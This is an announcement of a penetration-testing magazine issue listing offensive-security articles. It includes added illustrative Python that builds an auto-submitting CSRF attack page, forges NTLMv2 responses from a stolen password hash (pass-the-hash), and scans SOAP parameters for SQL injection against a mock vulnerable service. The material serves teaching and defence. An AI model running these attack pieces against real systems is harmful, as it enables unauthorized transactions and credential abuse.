Dear PenTest Readers,
We are proudly presenting to you the October OPEN issue.
A long time has passed since we last prepared something THAT special for readers without a subscription!
After long and thorough research, we have created a beautiful (and bloody) OPEN issue.
Hacking SAP Enterprise Portal
by Dmitry Chastukhin
Business applications have always been, and will remain, a prized target for cybercriminals. Such attacks can serve many purposes: industrial espionage, the desire to cause financial or reputational losses, or the sale of critical information. In this article, I explain in detail how a potential attacker can attack one of the most popular modules of the SAP ERP system, SAP Enterprise Portal, and how such attacks can be prevented.
Common Attack Patterns in Penetration Testing
by Sumit Agarwal
A penetration testing project that assesses the overall security of an organization covers various aspects and layers of its security infrastructure. The idea of a pentest is not just to check that controls exist but to evaluate whether those controls are sufficient and appropriate.
Automating POST-Method CSRF Attacks
by Justin Hutchens
Cross-Site Request Forgery (CSRF) is often compared to XSS (Cross-Site Scripting), but the comparison is not accurate. XSS exploits a vulnerability on the target server to access, manipulate and exploit data on the client side.
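As an added illustration of the distinction (this is editorial example code, not code from the article or its author), the following Python shows both sides of a POST-method CSRF: the attacker-side page that auto-submits a forged POST, which needs no flaw on the target server because the victim's browser attaches its own session cookie, and a server-side synchronizer-token check that defeats it. The target URL, field names and session layout are assumptions for illustration.

```python
import hmac
import html
import secrets
from typing import Mapping, Optional


def build_csrf_page(action: str, fields: Mapping[str, str]) -> str:
    """Attacker-side artifact: an HTML page that auto-submits a POST form.

    Nothing here exploits the target server; the browser of a logged-in
    victim simply sends the request with the victim's own session cookie.
    """
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(n, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for n, v in fields.items()
    )
    return (
        "<!doctype html><html><body>\n"
        f'  <form id="f" method="POST" action="{html.escape(action, quote=True)}">\n'
        f"{inputs}\n"
        "  </form>\n"
        "  <script>document.getElementById('f').submit();</script>\n"
        "</body></html>\n"
    )


# --- defender side: synchronizer token bound to the server-side session ---

def issue_token(session: dict) -> str:
    """Mint a random anti-CSRF token and store it in the (assumed) session dict."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def is_request_allowed(session: dict, form: Mapping[str, str],
                       origin: Optional[str], site_origin: str) -> bool:
    """Accept a state-changing POST only if it carries the session's token
    (compared in constant time) and, when the browser sent an Origin header,
    that header matches our own site."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return False
    if origin is not None and origin != site_origin:
        return False
    return True


if __name__ == "__main__":
    # Constructed scenario: bank transfer endpoint (hypothetical URL).
    print(build_csrf_page("https://bank.example/transfer",
                          {"to": "attacker", "amount": "1000"}))
```

The forged form cannot include the token because the attacker's page cannot read the victim's session, which is exactly why the token check succeeds where cookie-only authentication fails.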
Blackhat Recon With Wireshark
by Lee Alexander King
On unknown networks and in black hat testing, Wireshark is a must-have tool for finding critical information about your surroundings, the infrastructure and potential vulnerabilities. Find out more together with Lee Alexander King.
Bypassing new generation Firewalls with Meterpreter and SSH Tunnels
by Ignacio Sorribas
This article shows how, in some cases, the firewall detects malicious code and is able to block the connections, but also demonstrates how easy it is to bypass that restriction with Meterpreter and SSH tunnels.
Taking Over an Active Directory
by Gilad Ofir
As pentesters and security specialists, we often come across the need to secure infrastructure, because our systems are constantly at risk from internal and external attacks. The attack demonstrated in the article presents a simple scenario in which an attacker takes over an Active Directory domain using only BackTrack and, of course, our knowledge.
MS Internet Explorer Same ID Property Remote Code Execution Vulnerability
by Praveen Parihar
In this article you will learn the concepts behind Internet Explorer memory corruption: which mitigation-bypass techniques are used, how heap-based and stack-based overflow attacks work, and the return-oriented programming concepts used to exploit remote code execution vulnerabilities.
by Christopher Ashby
Pass-The-Hash (PTH) is a post-exploitation attack technique in which an attacker obtains user account password hashes from client workstations or domain servers and then uses those hashes directly, without cracking them, to elevate privileges and/or create new authenticated sessions. The technique is used after the attacker has already gained access to your environment; special attention should therefore be paid to the risk posed by malicious insiders or rogue employees.
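As an added, self-contained illustration of why the hash alone is a usable credential (editorial example code, not taken from the article or its author), the Python below implements MD4 in pure Python, derives the NT hash of a password, and computes an NTLMv2 response from the NT hash alone. Because the password only ever enters the protocol as MD4(UTF-16LE(password)), a stolen hash lets an attacker produce the same response as the legitimate client. The user name, domain and challenge values are constructed test data.

```python
import hashlib
import hmac
import os
import struct


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled, so we carry our own."""
    M = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]),
        (G, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    # Merkle-Damgard padding: 0x80, zeros to 56 mod 64, then 64-bit little-endian bit length.
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a = _lrot((a + fn(b, c, d) + X[k] + const) & M, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & M, (b + bb) & M, (c + cc) & M, (d + dd) & M
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash as stored in the SAM / NTDS: MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(nt: bytes, user: str, domain: str) -> bytes:
    """NTLMv2 key: HMAC-MD5 keyed by the NT hash over UPPER(user) + domain."""
    return hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_response(nt: bytes, user: str, domain: str,
                    server_challenge: bytes, client_blob: bytes) -> bytes:
    """NTProofStr || blob, as sent in the NTLM AUTHENTICATE message.

    Note the input is the NT hash, never the password: this is the whole
    basis of pass-the-hash.
    """
    key = ntowf_v2(nt, user, domain)
    proof = hmac.new(key, server_challenge + client_blob, hashlib.md5).digest()
    return proof + client_blob


def attacker_matches_victim(password: str, stolen_nt_hash: bytes, user: str,
                            domain: str, challenge: bytes, blob: bytes) -> bool:
    """Does a response built from the stolen hash equal the legitimate one?"""
    legit = ntlmv2_response(nt_hash(password), user, domain, challenge, blob)
    forged = ntlmv2_response(stolen_nt_hash, user, domain, challenge, blob)
    return hmac.compare_digest(legit, forged)


if __name__ == "__main__":
    # Constructed scenario: user "alice" in domain "CORP" with a weak password.
    h = nt_hash("password")
    print("NT hash:", h.hex())
    chal, blob = os.urandom(8), os.urandom(28)
    print("forged == legitimate:",
          attacker_matches_victim("password", h, "alice", "CORP", chal, blob))
```

The defensive corollary follows directly: protecting the hash (no reuse of local administrator passwords, Protected Users, Credential Guard, restricting who can log on where) matters as much as protecting the password itself.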
From SQLi in Oracle to Remote Execution
by Jose Selvi
SQL Injection is one of the most common vulnerabilities you can find in web applications; in fact, Injection holds the number 1 spot in the well-known OWASP Top 10. As you probably know, SQL Injection can be exploited to extract all the information stored in a database, but that is not all that can be done with this kind of vulnerability. Databases are complex systems and can be misconfigured or outdated. In this article the author describes one possible scenario: a SQL Injection that allows us to execute SQL statements on an Oracle 11g database in order to exploit its vulnerabilities and achieve a complete compromise of the system.
How to Detect SQL Injection Vulnerabilities in SOAP
by Francesco Perna and Pietro Minniti
SQL Injections are a well-known topic in web application security. So, why another article about them? Because not all SQL injections are so obvious, and pentesters often look for them only in the web application's GET/POST parameters. In this article, the authors describe a real-world example in which automated vulnerability scanners failed to detect a SQL injection vulnerability residing in the code of a SOAP web service invoked by an MDI Windows application. In particular, they describe the exploitation phases, from detection to the acquisition of database data, using commonly available tools.
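As an added illustration of the detection step (editorial example code, not the authors' tooling or the real service they tested), the Python below treats every leaf element of a SOAP request body as an injectable parameter, mutates each with a quote payload, and flags parameters whose response turns into a SOAP Fault carrying a database error. The service, its namespace, the customer table and the `send` callable are all constructed for the example; the mock backend builds its SQL by string concatenation against an in-memory SQLite database so that the injection is real rather than simulated. Swap `mock_service` for a function that POSTs the envelope to a real endpoint to use the scanner against a live service.

```python
import sqlite3
import xml.etree.ElementTree as ET
from typing import Callable, Iterator, List

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"

# Constructed request, as a desktop client might send it (hypothetical service).
SAMPLE_REQUEST = """<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetCustomer xmlns="http://example.invalid/crm">
      <CustomerId>1042</CustomerId>
      <Region>north</Region>
    </GetCustomer>
  </soap:Body>
</soap:Envelope>"""


def _local(tag: str) -> str:
    return tag.split("}")[-1]


def mock_service(envelope: str) -> str:
    """Hypothetical vulnerable backend: concatenates SOAP parameters into SQL."""
    root = ET.fromstring(envelope)
    op = list(root.find(f"{{{SOAP_NS}}}Body"))[0]
    params = {_local(c.tag): (c.text or "") for c in op}
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers(id INTEGER, region TEXT, name TEXT)")
    conn.execute("INSERT INTO customers VALUES (1042, 'north', 'ACME')")
    sql = (f"SELECT name FROM customers WHERE id = {params.get('CustomerId') or '0'} "
           f"AND region = '{params.get('Region', '')}'")          # the bug
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:                                   # leaks the DB error
        return f"<soap:Fault><faultstring>{exc}</faultstring></soap:Fault>"
    return f"<GetCustomerResponse><Name>{row[0] if row else ''}</Name></GetCustomerResponse>"


def _leaf_params(root: ET.Element) -> Iterator[ET.Element]:
    """Yield every childless element under the operation inside soap:Body."""
    for op in root.find(f"{{{SOAP_NS}}}Body"):
        for el in op.iter():
            if el is not op and len(el) == 0:
                yield el


SQL_ERROR_MARKERS = ("syntax error", "unrecognized token", "unterminated", "ora-", "sql")


def scan_soap_for_sqli(envelope: str, send: Callable[[str], str],
                       payloads=("'", '"')) -> List[dict]:
    """Error-based SQLi detection over every SOAP body parameter.

    A parameter is reported when the unmodified request succeeds but appending
    a quote payload yields a Fault whose text looks like a database error.
    """
    root = ET.fromstring(envelope)
    baseline = send(envelope)
    findings = []
    for el in _leaf_params(root):
        original = el.text or ""
        for payload in payloads:
            el.text = original + payload
            resp = send(ET.tostring(root, encoding="unicode"))
            el.text = original                       # restore before next mutation
            lowered = resp.lower()
            if ("fault" in lowered and "fault" not in baseline.lower()
                    and any(m in lowered for m in SQL_ERROR_MARKERS)):
                findings.append({"parameter": _local(el.tag),
                                 "payload": payload, "evidence": resp[:80]})
                break
    return findings


if __name__ == "__main__":
    for f in scan_soap_for_sqli(SAMPLE_REQUEST, mock_service):
        print(f)
```

The point the article makes is visible in the code: the injectable values never appear in a URL or an HTML form, so a scanner that only mutates GET/POST parameters of web pages will never touch `CustomerId` or `Region`; only a scanner that walks the XML body finds them.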